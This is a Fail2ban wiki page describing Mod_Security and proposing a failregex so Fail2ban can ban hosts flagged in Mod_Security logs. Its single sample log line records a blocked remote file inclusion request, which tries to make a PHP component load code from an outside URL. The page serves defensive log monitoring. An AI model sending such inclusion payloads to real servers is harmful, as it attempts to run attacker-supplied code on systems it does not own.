Mod Security

From Fail2ban
Revision as of 12:29, 22 February 2008 by 87.167.48.13 (Talk) (New page: '''Mod_Security''' is a security module for Apache, filtering input or output using a set of signatures. Mod_Security is sometimes called a webapplication firewall. More information about ...)

(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)
Jump to: navigation, search

Mod_Security is a security module for Apache, filtering input or output using a set of signatures. Mod_Security is sometimes called a webapplication firewall. More information about Mod_Security can be found at [1]



  • Feb 22 10:39:57 modsec@lvps87-230-5-231 modsec: Request: www.website.de 195.182.210.154 - - [22/Feb/2008:10:39:56 +0100] "GET /component/index.php?mosConfig_absolute_path=http://www.trinityprep.com/help.txt?? HTTP/1.1" 403 959 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" - "-"


Failregex

The regular expressions below are proposed failregex for this software. Multiple regular expressions for failregex will only work with a version of Fail2ban greater than or equal to 0.7.6.

The tag <HOST> in the regular expressions below is just an alias for (?:::f{4,6}:)?(?P<host>\S+). The replacement is done automatically by Fail2ban when adding the regular expression. At the moment, exactly one named group host or <HOST> tag must be present in each regular expression.

Please, before editing this section, propose your changes in the discussion page first.


  • Request: (.*?) <HOST>